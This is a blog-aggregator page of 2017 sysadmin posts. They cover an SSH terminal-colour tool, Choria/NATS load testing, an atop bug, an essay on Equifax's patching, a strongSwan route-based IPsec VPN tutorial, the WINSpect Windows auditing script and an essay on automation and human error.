Walkaway by Cory Doctorow

Are you willing to walk-away without anything in the world to build a better world ?

walkaway.jpg

Tag(s): books

September 23, 2017 09:36 AM

Electricmonk.nl

sshbg: Change terminal background when SSHing (for Tilix and Xterm)

This is gonna be a short post. I wrote a tool to change the background color of my terminal when I ssh to a machine. It works on Tilix and Xterm, but not on most other terminals, because they don't support the ANSI escape sequence for changing the background color. It works by combining SSH's LocalCommand option with a small Python script that parses the given hostname. Here's a short gif of it in action:
 

It's called sshbg.
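The underlying trick is small enough to sketch. The actual sshbg code differs; this is just a rough illustration of the idea, and the hostname-to-color mapping here is a made-up example:

```python
import hashlib
import sys

def host_color(hostname):
    # Derive a stable, dark background color from the hostname,
    # so the same host always gets the same color.
    digest = hashlib.md5(hostname.encode("utf-8")).digest()
    r, g, b = (c % 64 for c in digest[:3])  # cap channels to keep it dark
    return "#%02x%02x%02x" % (r, g, b)

def set_background(hostname, out=sys.stdout):
    # OSC 11 is the escape sequence Xterm and Tilix honour for
    # changing the terminal background color.
    out.write("\033]11;%s\007" % host_color(hostname))
    out.flush()
```

Hooked up via LocalCommand in ssh_config (with PermitLocalCommand enabled), something like this runs on every connection.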

by admin at September 23, 2017 07:52 AM

September 22, 2017

R.I.Pienaar

What to consider when speccing a Choria network

In my previous post I talked about the need to load test Choria given that I now aim for much larger workloads. This post goes into a few of the things you need to consider when sizing the optimal network size.

Given that we now have the flexibility to build 50 000 node networks quite easily with Choria, the question is: should we, and if so, what is the right size? As we can now federate multiple Collectives together into one, where each member Collective is a standalone network, we have the opportunity to optimise for the operability of the network rather than being forced to just build it as big as we can.

What do I mean when I say the operability of the network? Quite a lot of things:

  • What is your target response time on an unbatched mco rpc rpcutil ping command?
  • What is your target discovery time? You should use a discovery data source, but broadcast is useful, so how long do you want it to take?
  • If you are using a discovery source, how long do you want to wait for publishes to happen?
  • How many agents will you run? Each agent makes multiple subscriptions on the middleware and consumes resources there
  • How many sub collectives do you want? Each sub collective multiplies the number of subscriptions
  • How many federated networks will you run?
  • When you restart the entire NATS cluster, how long do you want to wait for the whole network to reconnect?
  • How many NATS servers do you need? One can run 50 000 nodes, but you might want a cluster for HA. Clustering introduces overhead in the middleware
  • If you are federating a globally distributed network, what impact does the latency across the federation have, and what is acceptable?

So you can see that to a large extent the answer here is related to your needs and not only to the needs of benchmarking Choria. I am working on a set of tools to allow anyone to run tests locally or on an EC2 network. The main workhorse is a Choria emulator that runs 1 000 or more Choria instances on a single node, so you can use a 50 node EC2 network to simulate a 50 000 node one.

Middleware Scaling Concerns


Generally for middleware brokers there are a few things that impact their scalability:

  • Number of TCP Connections – generally a thread/process is made for each
  • TLS or plain text – TLS typically carries a huge overhead and can put a lot of strain on single systems
  • Number of message targets – queues, topics, etc. Different types of target have different overheads. Often a thread/process for each.
  • Number of subscribers to each target
  • Cluster overhead
  • Persistence overheads like storage and ACKs etc

You can see it’s quite a large number of variables that go into this; anywhere that requires a thread or process to manage one of them is something you should get worried about, or at least be in a position to measure.

NATS uses one Go routine for each connection and no additional ones per subscription etc.; it’s quite lightweight, but there are no hard and fast rules. It’s best to observe how it grows by needs, something I’ll include in my test suite.

How Choria uses NATS


It helps then to understand how Choria will use NATS and what connections and targets it makes.

A single Choria node will:

  • Maintain a single TCP+TLS connection to NATS
  • Subscribe to 1 queue unique to the node for every Subcollective it belongs to
  • For every agent – puppet, package, service, etc. – subscribe to a broadcast topic for that agent, once in every Subcollective. Choria comes with 7 agents by default.

So if you have a node with 10 agents in 5 Subcollectives:

  • 50 broadcast subjects for agents
  • 5 queue subjects
  • 1 TCP+TLS connection

So 100 nodes will have 5 500 subscriptions, 550 NATS subjects and 100 TCP+TLS connections.
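The arithmetic above generalizes. Here's a quick sketch (my assumption, following the description above: broadcast subjects are shared across all nodes while queue subjects are unique per node):

```python
def nats_footprint(nodes, agents, subcollectives):
    """Estimate NATS usage for a Choria network of identical nodes."""
    # Each node: one broadcast subscription per agent per Subcollective,
    # plus one unique queue subscription per Subcollective.
    subs_per_node = agents * subcollectives + subcollectives
    subscriptions = nodes * subs_per_node
    # Broadcast subjects are shared by all nodes; queue subjects are per node.
    subjects = agents * subcollectives + nodes * subcollectives
    connections = nodes  # one TCP+TLS connection per node
    return subscriptions, subjects, connections

# The example from the text: 100 nodes, 10 agents, 5 Subcollectives.
print(nats_footprint(100, 10, 5))  # → (5500, 550, 100)
```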

Ruby-based Federation brokers will maintain 1 subscription to a queue subject on the Federation side and the same on the Collective side. The upcoming Go-based Federation Brokers will maintain 10 (configurable) connections to NATS on each side, each with these subscriptions.

Conclusion


This will give us a good input into designing a suite of tools to measure various things during the run time of a big test, check back later for details about such a tool.

You can read about the emulator I wrote in the next post.

by R.I. Pienaar at September 22, 2017 10:41 AM

September 19, 2017

R.I.Pienaar

Load testing Choria

Overview


Many of you probably know I am working on a project called Choria that modernizes MCollective and will eventually supersede it (more on this later).

Given that Choria is heading down a path of being a rewrite in Go I am also taking the opportunity to look into much larger scale problems to meet some client needs.

In this and the following posts I’ll write about work I am doing to load test and validate Choria to 100s of thousands of nodes and what tooling I created to do that.

Middleware


Choria builds around the NATS middleware, a Go based middleware server that forgoes a lot of the persistence and other expensive features – instead it focuses on being a fire-and-forget middleware network. There is an additional project should you need those features, so you can mix and match quite easily.

Turns out that’s exactly what typical MCollective needs as it never really used the persistence features and those just made the associated middleware quite heavy.

To give you an idea, in the old days the community would suggest every ~ 1000 nodes managed by MCollective required a single ActiveMQ instance. Want 5 500 MCollective nodes? That’ll be 6 machines – physical recommended – and 24 to 30 GB RAM in a cluster just to run the middleware. We’ve had reports of much larger RabbitMQ networks on 4 or 5 servers – 50 000 managed nodes or more, but those would be big machines and they had quite a lot of performance issues.

There was a time when 5 500 nodes was A LOT, but now it’s becoming rather ordinary, so I need to focus upward.

With NATS+Choria I am happily running 5 500 nodes on a single 2 CPU VM with 4GB RAM. In fact, on a slightly bigger VM I am happily running 50 000 nodes, with NATS using around 1GB to 1.5GB of RAM at peak.

Doing 100s of RPC requests in a row against 50 000 nodes, the response time is pretty solid at around 16 seconds for an RPC call to every node; it’s stable, never drops a message, and the performance stays level in the absence of Java GC issues. This is fast but also quite slow – the Ruby client manages about 300 replies every 0.10 seconds due to the amount of protocol decoding that is needed.
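Those two figures are consistent with each other, as a back-of-the-envelope check shows (a sketch using only the numbers quoted above):

```python
# The Ruby client decodes roughly 300 replies every 0.10 seconds.
replies_per_second = 300 / 0.10          # about 3 000 replies/s
nodes = 50_000
client_decode_time = nodes / replies_per_second
print(round(client_decode_time, 1))      # → 16.7, matching the ~16 s observed
```

So at these network sizes the client-side protocol decoding, not the middleware, is the bottleneck.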

This brings with it a whole new level of problem: just how far can we take the client code, how do you determine when a network is too big, and how do I know whether the client, broker and federation I am working on significantly improve things?

I’ve also significantly reworked the network protocol to support Federation, but the shipped code optimizes for code and config simplicity over, let’s say, support for 20 000 Federation Collectives. When we are talking about truly gigantic Choria networks I need to be able to test scenarios involving 10s of thousands of Federated Networks, each with 10s of thousands of nodes in them. So I need tooling that lets me do this.

Getting to running 50 000 nodes


Not everyone just happens to have a 50 000 node network lying about that they can play with, so I had to improvise a bit.

As part of the rewrite I am building a Go framework with the Choria protocol, config parsing and network handling all built in Go. Unlike with the Ruby code, I can instantiate multiple of these in memory and run them in Go routines.

This means I could write an emulator that can start a number of faked Choria daemons all in one process. They each have their own middleware connection, run a varying number of agents with a varying number of sub collectives, and generally behave like a normal MCollective machine. On my MacBook I can run 1 500 Choria instances quite easily.

So with fewer than 60 machines I can emulate 50 000 MCollective nodes on a 3 node NATS cluster and have plenty of spare capacity. This is well within budget to run on AWS, and it’s not uncommon these days to have that many dev machines around.
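The machine-count estimate works out as follows (a sketch; the 1 000 instances per machine figure is my conservative assumption, given that a MacBook manages 1 500):

```python
import math

total_nodes = 50_000
instances_per_machine = 1_000   # conservative: a MacBook handles 1 500
machines = math.ceil(total_nodes / instances_per_machine)
print(machines)  # → 50, comfortably under the 60-machine figure
```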

In the following posts I’ll cover bits about the emulator, what I look for when determining optimal network sizes and how to use the emulator to test and validate performance of different network topologies.

Follow-up Posts

by R.I. Pienaar at September 19, 2017 09:55 AM

September 18, 2017

Raymii.org

atop is broken on Ubuntu 16.04 (version 1.26): trap divide error

Recently a few of my Ubuntu 16.04 machines had issues, and while troubleshooting them I noticed the `atop` logs were missing. atop is a very handy tool which can be set up to record system state every X minutes; we set it up to run every 5 minutes. You can then at a later moment see what the server was doing, even sorting by disk, memory, cpu or network usage. This post discusses the error and a quick fix.

September 18, 2017 12:00 AM

September 15, 2017

Cryptography Engineering

Patching is hard; so what?

It’s now been about a week since Equifax announced the record-breaking breach that affected 143 million Americans. We still don’t know enough — but a few details have begun to come out about the causes of the attack. It’s now being reported that Equifax’s woes stem from an unpatched vulnerability in Apache Struts that dates from March 2017, nearly two months before the breach began. This flaw, which allows remote command execution on affected servers, somehow allowed an attacker to gain access to a whopping amount of Equifax’s customer data.

While many people have criticized Equifax for its failure, I’ve noticed a number of tweets from information security professionals making the opposite case. Specifically, these folks point out that patching is hard. The gist of these points is that you can’t expect a major corporation to rapidly deploy something as complex as a major framework patch across their production systems. The stronger version of this point is that the people who expect fast patch turnaround have obviously never patched a production server.

I don’t dispute this point. It’s absolutely valid. My very simple point in this post is that it doesn’t matter. Excusing Equifax for their slow patching is both irrelevant and wrong. Worse: whatever the context, statements like this will almost certainly be used by Equifax to excuse their actions. This actively makes the world a worse place.

I don’t operate production systems, but I have helped to design a couple of them. So I understand something about the assumptions you make when building them.

If you’re designing a critical security system you have choices to make. You can build a system that provides defense-in-depth — i.e., that makes the assumption that individual components will fail and occasionally become insecure. Alternatively, you can choose to build systems that are fragile — that depend fundamentally on the correct operation of all components at all times. Both options are available to system designers, and making the decision is up to those designers; or just as accurately, the managers that approve their design.

The key point is that once you’ve baked this cake, you’d better be willing to eat it. If your system design assumes that application servers will not contain critical vulnerabilities — and you don’t have resilient systems in place to handle the possibility that they do — then you’ve implicitly made the decision that you’re never ever going to allow those vulnerabilities to fester. Once an in-the-wild vulnerability is detected in your system, you’d damn well better have a plan to patch, and patch quickly. That may involve automated testing. It may involve taking your systems down, or devoting enormous resources to monitoring activity. If you can’t do that, you’d better have an alternative. Running insecure is not an option.

So what would those systems look like? Among more advanced system designs I’ve begun to see a move towards encrypting back-end data. By itself this doesn’t do squat to protect systems like Equifax’s, because those systems are essentially “hot” databases that have to provide cleartext data to application servers — precisely the systems that Equifax’s attackers breached.

The common approach to dealing with this problem is twofold. First, you harden the cryptographic access control components that handle decryption and key management for the data — so that a breach in an application server doesn’t lead to the compromise of the access control gates. Second, you monitor, monitor, monitor. The sole advantage that encryption gives you here is that your gates for access control are now reduced to only the systems that manage encryption. Not your database. Not your web framework. Just a — hopefully — small and well-designed subsystem that monitors and grants access to each record. Everything else is monitoring.
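The twofold approach — a small hardened gate plus pervasive monitoring — can be pictured with a toy model (entirely my own illustration, not anything from Equifax or a real crypto system): every record decryption flows through one small subsystem that both grants access and watches the access rate.

```python
import time
from collections import deque

class DecryptionGate:
    """Toy model of an access-control gate: every record decryption passes
    through one small subsystem that grants access and monitors the rate."""

    def __init__(self, max_reads_per_minute):
        self.max_reads = max_reads_per_minute
        self.recent = deque()  # timestamps of recent reads

    def read_record(self, requester, record_id, now=None):
        now = time.time() if now is None else now
        # Slide the one-minute window, then check the rate before decrypting.
        while self.recent and now - self.recent[0] > 60:
            self.recent.popleft()
        if len(self.recent) >= self.max_reads:
            raise PermissionError("rate limit hit - possible bulk exfiltration")
        self.recent.append(now)
        return "<decrypted record {} for {}>".format(record_id, requester)

gate = DecryptionGate(max_reads_per_minute=2)
gate.read_record("app-server", 1, now=0.0)
gate.read_record("app-server", 2, now=1.0)
# A third read inside the same window would raise PermissionError.
```

The point of the design is that a breached application server can only pull records at the rate the gate allows, and every pull leaves a monitoring trail.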

Equifax claims to have resilient systems in place. Only time will tell if they looked like this. What seems certain is that whatever those systems are, they didn’t work. And given both the scope and scale of this breach, that’s a cake I’d prefer not to have to eat.


by Matthew Green at September 15, 2017 10:21 PM

September 13, 2017

Vincent Bernat

Route-based IPsec VPN on Linux with strongSwan

A common way to establish an IPsec tunnel on Linux is to use an IKE daemon, like the one from the strongSwan project, with a minimal configuration1:

conn V2-1
  left        = 2001:db8:1::1
  leftsubnet  = 2001:db8:a1::/64
  right       = 2001:db8:2::1
  rightsubnet = 2001:db8:a2::/64
  authby      = psk
  auto        = route

The same configuration can be used on both sides. Each side will figure out if it is “left” or “right”. The IPsec site-to-site tunnel endpoints are 2001:db8:1::1 and 2001:db8:2::1. The protected subnets are 2001:db8:a1::/64 and 2001:db8:a2::/64. As a result, strongSwan configures the following policies in the kernel:

$ ip xfrm policy
src 2001:db8:a1::/64 dst 2001:db8:a2::/64
        dir out priority 399999 ptype main
        tmpl src 2001:db8:1::1 dst 2001:db8:2::1
                proto esp reqid 4 mode tunnel
src 2001:db8:a2::/64 dst 2001:db8:a1::/64
        dir fwd priority 399999 ptype main
        tmpl src 2001:db8:2::1 dst 2001:db8:1::1
                proto esp reqid 4 mode tunnel
src 2001:db8:a2::/64 dst 2001:db8:a1::/64
        dir in priority 399999 ptype main
        tmpl src 2001:db8:2::1 dst 2001:db8:1::1
                proto esp reqid 4 mode tunnel
[…]

This kind of IPsec tunnel is a policy-based VPN: encapsulation and decapsulation are governed by these policies. Each of them contains the following elements:

  • a direction (out, in or fwd2),
  • a selector (source subnet, destination subnet, protocol, ports),
  • a mode (transport or tunnel),
  • an encapsulation protocol (esp or ah), and
  • the endpoint source and destination addresses.

When a matching policy is found, the kernel will look for a corresponding security association (using reqid and the endpoint source and destination addresses):

$ ip xfrm state
src 2001:db8:1::1 dst 2001:db8:2::1
        proto esp spi 0xc1890b6e reqid 4 mode tunnel
        replay-window 0 flag af-unspec
        auth-trunc hmac(sha256) 0x5b68[…]8ba2904 128
        enc cbc(aes) 0x8e0e377ad8fd91e8553648340ff0fa06
        anti-replay context: seq 0x0, oseq 0x0, bitmap 0x00000000
[…]

If no security association is found, the packet is put on hold and the IKE daemon is asked to negotiate an appropriate one. Otherwise, the packet is encapsulated. The receiving end identifies the appropriate security association using the SPI in the header. Two security associations are needed to establish a bidirectional tunnel:

$ tcpdump -pni eth0 -c2 -s0 esp
13:07:30.871150 IP6 2001:db8:1::1 > 2001:db8:2::1: ESP(spi=0xc1890b6e,seq=0x222)
13:07:30.872297 IP6 2001:db8:2::1 > 2001:db8:1::1: ESP(spi=0xcf2426b6,seq=0x204)
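The receiver's SPI lookup can be pictured as a simple table keyed by SPI — a toy model, not kernel code, with the table mirroring the two SPIs from the capture above:

```python
# Inbound security associations, keyed by SPI (values from the capture above).
sa_by_spi = {
    0xc1890b6e: ("2001:db8:1::1", "2001:db8:2::1"),  # traffic from site 1
    0xcf2426b6: ("2001:db8:2::1", "2001:db8:1::1"),  # traffic from site 2
}

def find_sa(spi):
    """Return the (source, destination) endpoints for an incoming ESP packet."""
    return sa_by_spi.get(spi)  # None → the packet is dropped

print(find_sa(0xc1890b6e))  # → ('2001:db8:1::1', '2001:db8:2::1')
```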

All IPsec implementations are compatible with policy-based VPNs. However, some configurations are difficult to implement. For example, consider the following proposition for redundant site-to-site VPNs:

Redundant VPNs between 3 sites

A possible configuration between V1-1 and V2-1 could be:

conn V1-1-to-V2-1
  left        = 2001:db8:1::1
  leftsubnet  = 2001:db8:a1::/64,2001:db8:a6::cc:1/128,2001:db8:a6::cc:5/128
  right       = 2001:db8:2::1
  rightsubnet = 2001:db8:a2::/64,2001:db8:a6::/64,2001:db8:a8::/64
  authby      = psk
  keyexchange = ikev2
  auto        = route

Each time a subnet is modified on one site, the configurations need to be updated on all sites. Moreover, overlapping subnets (2001:db8:a6::/64 on one side and 2001:db8:a6::cc:1/128 on the other) can also be problematic.

The alternative is to use route-based VPNs: any packet traversing a pseudo-interface will be encapsulated using a security policy bound to the interface. This brings two features:

  1. Routing daemons can be used to distribute routes to be protected by the VPN. This decreases the administrative burden when many subnets are present on each side.
  2. Encapsulation and decapsulation can be executed in a different routing instance or namespace. This enables a clean separation between a private routing instance (where VPN users are) and a public routing instance (where VPN endpoints are).

Route-based VPN on Juniper

Before looking at how to achieve that on Linux, let’s have a look at the way it works with a JunOS-based platform (like a Juniper vSRX). This platform has a long-standing history of supporting route-based VPNs (a feature already present in the Netscreen ISG platform).

Let’s assume we want to configure the IPsec VPN from V3-2 to V1-1. First, we need to configure the tunnel interface and bind it to the “private” routing instance containing only internal routes (with IPv4, they would have been RFC 1918 routes):

interfaces {
    st0 {
        unit 1 {
            family inet6 {
                address 2001:db8:ff::7/127;
            }
        }
    }
}
routing-instances {
    private {
        instance-type virtual-router;
        interface st0.1;
    }
}

The second step is to configure the VPN:

security {
    /* Phase 1 configuration */
    ike {
        proposal IKE-P1 {
            authentication-method pre-shared-keys;
            dh-group group20;
            encryption-algorithm aes-256-gcm;
        }
        policy IKE-V1-1 {
            mode main;
            proposals IKE-P1;
            pre-shared-key ascii-text "d8bdRxaY22oH1j89Z2nATeYyrXfP9ga6xC5mi0RG1uc";
        }
        gateway GW-V1-1 {
            ike-policy IKE-V1-1;
            address 2001:db8:1::1;
            external-interface lo0.1;
            general-ikeid;
            version v2-only;
        }
    }
    /* Phase 2 configuration */
    ipsec {
        proposal ESP-P2 {
            protocol esp;
            encryption-algorithm aes-256-gcm;
        }
        policy IPSEC-V1-1 {
            perfect-forward-secrecy keys group20;
            proposals ESP-P2;
        }
        vpn VPN-V1-1 {
            bind-interface st0.1;
            df-bit copy;
            ike {
                gateway GW-V1-1;
                ipsec-policy IPSEC-V1-1;
            }
            establish-tunnels on-traffic;
        }
    }
}

We get a route-based VPN because we bind the st0.1 interface to the VPN-V1-1 VPN. Once the VPN is up, any packet entering st0.1 will be encapsulated and sent to the 2001:db8:1::1 endpoint.

The last step is to configure BGP in the “private” routing instance to exchange routes with the remote site:

routing-instances {
    private {
        routing-options {
            router-id 1.0.3.2;
            maximum-paths 16;
        }
        protocols {
            bgp {
                preference 140;
                log-updown;
                group v4-VPN {
                    type external;
                    local-as 65003;
                    hold-time 6;
                    neighbor 2001:db8:ff::6 peer-as 65001;
                    multipath;
                    export [ NEXT-HOP-SELF OUR-ROUTES NOTHING ];
                }
            }
        }
    }
}

The export filter OUR-ROUTES needs to select the routes to be advertised to the other peers. For example:

policy-options {
    policy-statement OUR-ROUTES {
        term 10 {
            from {
                protocol ospf3;
                route-type internal;
            }
            then {
                metric 0;
                accept;
            }
        }
    }
}

The configuration needs to be repeated for the other peers. The complete version is available on GitHub. Once the BGP sessions are up, we start learning routes from the other sites. For example, here is the route for 2001:db8:a1::/64:

> show route 2001:db8:a1::/64 protocol bgp table private.inet6.0 best-path

private.inet6.0: 15 destinations, 19 routes (15 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

2001:db8:a1::/64   *[BGP/140] 01:12:32, localpref 100, from 2001:db8:ff::6
                      AS path: 65001 I, validation-state: unverified
                      to 2001:db8:ff::6 via st0.1
                    > to 2001:db8:ff::14 via st0.2

It was learnt both from V1-1 (through st0.1) and V1-2 (through st0.2). The route is part of the private routing instance but encapsulated packets are sent/received in the public routing instance. No route-leaking is needed for this configuration. The VPN cannot be used as a gateway from internal hosts to external hosts (or vice-versa). This could also have been done with JunOS’ security policies (stateful firewall rules), but doing the separation with routing instances also ensures routes from different domains are not mixed, and a simple policy misconfiguration won’t lead to a disaster.

Route-based VPN on Linux

Starting from Linux 3.15, a similar configuration is possible with the help of a virtual tunnel interface3. First, we create the “private” namespace:

# ip netns add private
# ip netns exec private sysctl -qw net.ipv6.conf.all.forwarding=1

Any “private” interface needs to be moved to this namespace (no IP is configured as we can use IPv6 link-local addresses):

# ip link set netns private dev eth1
# ip link set netns private dev eth2
# ip netns exec private ip link set up dev eth1
# ip netns exec private ip link set up dev eth2

Then, we create vti6, a tunnel interface (similar to st0.1 in the JunOS example):

# ip tunnel add vti6 \
   mode vti6 \
   local 2001:db8:1::1 \
   remote 2001:db8:3::2 \
   key 6
# ip link set netns private dev vti6
# ip netns exec private ip addr add 2001:db8:ff::6/127 dev vti6
# ip netns exec private sysctl -qw net.ipv4.conf.vti6.disable_policy=1
# ip netns exec private sysctl -qw net.ipv4.conf.vti6.disable_xfrm=1
# ip netns exec private ip link set vti6 mtu 1500
# ip netns exec private ip link set vti6 up

The tunnel interface is created in the initial namespace and moved to the “private” one. It will remember its original namespace where it will process encapsulated packets. Any packet entering the interface will temporarily get a firewall mark of 6 that will be used only to match the appropriate IPsec policy4 below. The kernel sets a low MTU on the interface to handle any possible combination of ciphers and protocols. We set it to 1500 and let PMTUD do its work.

We can then configure strongSwan5:

conn V3-2
  left        = 2001:db8:1::1
  leftsubnet  = ::/0
  right       = 2001:db8:3::2
  rightsubnet = ::/0
  authby      = psk
  mark        = 6
  auto        = route
  keyexchange = ikev2
  keyingtries = %forever
  ike         = aes256gcm16-prfsha384-ecp384!
  esp         = aes256gcm16-prfsha384-ecp384!
  mobike      = no

The IKE daemon configures the following policies in the kernel:

$ ip xfrm policy
src ::/0 dst ::/0
        dir out priority 399999 ptype main
        mark 0x6/0xffffffff
        tmpl src 2001:db8:1::1 dst 2001:db8:3::2
                proto esp reqid 1 mode tunnel
src ::/0 dst ::/0
        dir fwd priority 399999 ptype main
        mark 0x6/0xffffffff
        tmpl src 2001:db8:3::2 dst 2001:db8:1::1
                proto esp reqid 1 mode tunnel
src ::/0 dst ::/0
        dir in priority 399999 ptype main
        mark 0x6/0xffffffff
        tmpl src 2001:db8:3::2 dst 2001:db8:1::1
                proto esp reqid 1 mode tunnel
[…]

Those policies are used for any source or destination as long as the firewall mark is equal to 6, which matches the mark configured for the tunnel interface.
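Because the selectors are wildcards (::/0), the mark does all the matching work. A toy model of the lookup — an illustration of the matching logic, not the kernel's actual algorithm:

```python
# Simplified xfrm policies: wildcard selectors, distinguished only by mark.
policies = [
    {"dir": "out", "mark": 6, "tmpl": ("2001:db8:1::1", "2001:db8:3::2")},
    {"dir": "in",  "mark": 6, "tmpl": ("2001:db8:3::2", "2001:db8:1::1")},
]

def lookup(direction, mark):
    """Return the tunnel endpoints of the first matching policy, or None."""
    for policy in policies:
        if policy["dir"] == direction and policy["mark"] == mark:
            return policy["tmpl"]
    return None  # no policy → the packet is not encapsulated

print(lookup("out", 6))  # → ('2001:db8:1::1', '2001:db8:3::2')
print(lookup("out", 0))  # → None: unmarked traffic bypasses these policies
```

This is why traffic outside the vti6 interface (and therefore without the mark) never hits the tunnel, even though the selectors match everything.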

The last step is to configure BGP to exchange routes. We can use BIRD for this:

router id 1.0.1.1;
protocol device {
   scan time 10;
}
protocol kernel {
   persist;
   learn;
   import all;
   export all;
   merge paths yes;
}
protocol bgp IBGP_V3_2 {
   local 2001:db8:ff::6 as 65001;
   neighbor 2001:db8:ff::7 as 65003;
   import all;
   export where ifname ~ "eth*";
   preference 160;
   hold time 6;
}

Once BIRD is started in the “private” namespace, we can check routes are learned correctly:

$ ip netns exec private ip -6 route show 2001:db8:a3::/64
2001:db8:a3::/64 proto bird metric 1024
        nexthop via 2001:db8:ff::5  dev vti5 weight 1
        nexthop via 2001:db8:ff::7  dev vti6 weight 1

The above route was learnt from both V3-1 (through vti5) and V3-2 (through vti6). As with the JunOS version, there is no route-leaking between the “private” namespace and the initial one. The VPN cannot be used as a gateway between the two namespaces, only for encapsulation. This also prevents a misconfiguration (for example, the IKE daemon not running) from allowing packets to leave the private network.

As a bonus, unencrypted traffic can be observed with tcpdump on the tunnel interface:

$ ip netns exec private tcpdump -pni vti6 icmp6
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on vti6, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes
20:51:15.258708 IP6 2001:db8:a1::1 > 2001:db8:a3::1: ICMP6, echo request, seq 69
20:51:15.260874 IP6 2001:db8:a3::1 > 2001:db8:a1::1: ICMP6, echo reply, seq 69

You can find all the configuration files for this example on GitHub. The documentation of strongSwan also features a page about route-based VPNs.


  1. Everything in this post should work with Libreswan.

  2. fwd is for incoming packets on non-local addresses. It only makes sense in transport mode and is a Linux-only particularity. 

  3. Virtual tunnel interfaces (VTI) were introduced in Linux 3.6 (for IPv4) and Linux 3.12 (for IPv6). Appropriate namespace support was added in 3.15. KLIPS, an alternative out-of-tree stack available since Linux 2.2, also features tunnel interfaces. 

  4. The mark is set right before doing a policy lookup and restored after that. Consequently, it doesn’t affect other possible uses (filtering, routing). However, as Netfilter can also set a mark, one should be careful for conflicts. 

  5. The ciphers used here are the strongest ones currently possible while keeping compatibility with JunOS. The documentation for strongSwan contains a complete list of supported algorithms as well as security recommendations to choose them. 

by Vincent Bernat at September 13, 2017 08:20 AM

September 11, 2017

HolisticInfoSec.org

Toolsmith Tidbit: Windows Auditing with WINspect

WINSpect recently hit the toolsmith radar screen via Twitter, and the author, Amine Mehdaoui, just posted an update a couple of days ago, so there's no time like the present to give you a walk-through. WINSpect is a PowerShell-based Windows Security Auditing Toolbox. According to Amine's GitHub README, WINSpect "is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine aiming to identify security weaknesses and point to components that need further hardening. The main targets for the current version are domain-joined windows machines. However, some of the functions still apply for standalone workstations."
The current script feature set includes audit checks and enumeration for:

  • Installed security products
  • World-exposed local filesystem shares
  • Domain users and groups with local group membership
  • Registry autoruns
  • Local services that are configurable by Authenticated Users group members
  • Local services for which corresponding binary is writable by Authenticated Users group members
  • Non-system32 Windows Hosted Services and their associated DLLs
  • Local services with unquoted path vulnerability
  • Non-system scheduled tasks
  • DLL hijackability
  • User Account Control settings
  • Unattended install leftovers

I can see this useful PowerShell script coming in quite handy for assessments using the CIS Top 20 Security Controls. I ran it on my domain-joined Windows 10 Surface Book via a privileged PowerShell session and liked the results.


The script confirms that it's running with admin rights, checks the PowerShell version, then inspects Windows Firewall settings. Looking good on the firewall, and WINSpect tees right off on my Windows Defender instance and its configuration as well.
Not sharing a screenshot of my shares or admin users, sorry, but you'll find them enumerated when you run WINSpect.


WINSpect then confirmed that UAC was enabled and that it should notify me only when apps try to make changes, then checked my registry for autoruns; no worries on either front, all confirmed as expected.


WINSpect wrapped up with a quick check of configurable services. SMSvcHost is normal as part of .NET, even if I don't like it, but the flowExportService doesn't need to be there at all; I removed that a while ago after being really annoyed with it during testing. No user hosted services, and DLL Safe Search is enabled...bonus. Finally, no unattended install leftovers, and all the scheduled tasks are normal for my system. Sweet, pretty good overall, thanks WINSpect. :-)

Give it a try for yourself, and keep an eye out for updates. Amine indicates that Local Security Policy controls, administrative share configs, loaded DLLs, established/listening connections, and exposed GPO scripts are on the to-do list.
Cheers...until next time.

by Russ McRee (noreply@blogger.com) at September 11, 2017 12:29 AM

September 10, 2017

Debian Administration

This site is going to go read-only

This site was born in late September 2004, and has now reached 13 years of age and that seems to be a fitting time to stop.

by Steve at September 10, 2017 07:02 AM

September 08, 2017

Michael Biven

Reducing Human Error in Software Based Services

As I’m writing this Texas and Louisiana continue to deal with the impact of Hurricane Harvey. Hurricane Irma is heading towards Florida. Los Angeles just experienced the biggest fire to burn in its history (La Tuna Fire). And in the last three months there have been two different collisions between US Navy vessels and civilian ships that resulted in 17 fatalities and multiple injuries.

The interactions and relationships between people, actions, and events in high-risk endeavors are awe-inspiring. Put aside the horrific loss of life and think of the amount of stress and chaos involved. Imagine knowing that your actions can have irreversible consequences. Though these events can't be changed, I'm fascinated by the efforts to prevent them from repeating.

Think of those interactions between people, actions and events as change. There are examples of software systems having critical or fatal consequences when they fail to handle that change. For most of us the impact might be setbacks delaying work, or at most a financial consequence to our employer or ourselves. While the impact may differ, there are benefits to learning from professions other than our own that deal with change on a daily basis.

Our job as systems or ops engineers should be to build, maintain, troubleshoot, and retire the systems we're responsible for. But there's been a shift building that has us focusing more on becoming experts at evaluating new technology.

Advances in our tooling have allowed us to rebuild, replace, or re-provision from failures. This starts introducing complacency, because the tools start to have more context on the issues than we do. It shifts our focus away from reaching a better understanding of what's happening.

As the complexity and the number of systems involved increases our ability to understand what is happening and how they interact hasn’t kept up. If you have any third-party dependencies, what are the chances they’re going through a similar experience? How much of an impact does this have on your understanding of what’s happening in your own systems?

Atrophy of Basic Skills

The increased efficiency of our tooling creates a Jevons paradox. This is the economic idea that as the efficiency of something increases, consumption of it rises rather than falls. It is named after William Jevons, who in the 19th century noticed that the consumption of coal increased after the release of a new steam engine design. The improvements in this new design increased the efficiency of the coal-fired steam engine over its predecessors, which fueled a wider adoption of the steam engine. It became cheaper for more people to use the new technology, and this led to increased consumption of coal.

For us, the engineer's time is the coal and the tools are the new coal-fired engine. As the efficiency of the tooling increases we tend to use more of the engineer's time. Adoption of the tooling increases while the number of engineers tends to remain flat. Instead of bringing in more people, we try to do more with the people we have.

This contributes to an atrophying of the basic skills needed to do the job: things like troubleshooting, situational awareness, and being able to hold a mental model of what's happening. Building them is a journeyman's process. Actual production experience is the best teacher, and the best feedback comes from your peers. Tools are starting to replace the opportunities for people to have those experiences to learn from.

Children of the Magenta and the Dangers of Automation

For most of us, improving the efficiency of an engineer’s time will look like some sort of automation. And while there are obvious benefits, there are some not-so-obvious negatives. First, automation can hide from us the context of what is happening, what has happened, and what will happen. How many times have you heard, or asked yourself, “What’s it doing now?”

“A lot of what’s happening is hidden from view from the pilots. It’s buried. When the airplane starts doing something that is unexpected and the pilot says ‘hey, what’s it doing now?’ — that’s a very, very standard comment in cockpits today.”
– William Langewiesche, journalist and former American Airlines captain.

On May 31, 2009, 228 people died when Air France 447 lost altitude from 35,000 feet and pancaked into the Atlantic Ocean. A pressure probe had iced over, preventing the aircraft from determining its speed. This caused the autopilot to disengage, and the “fly-by-wire” system switched into a different mode.

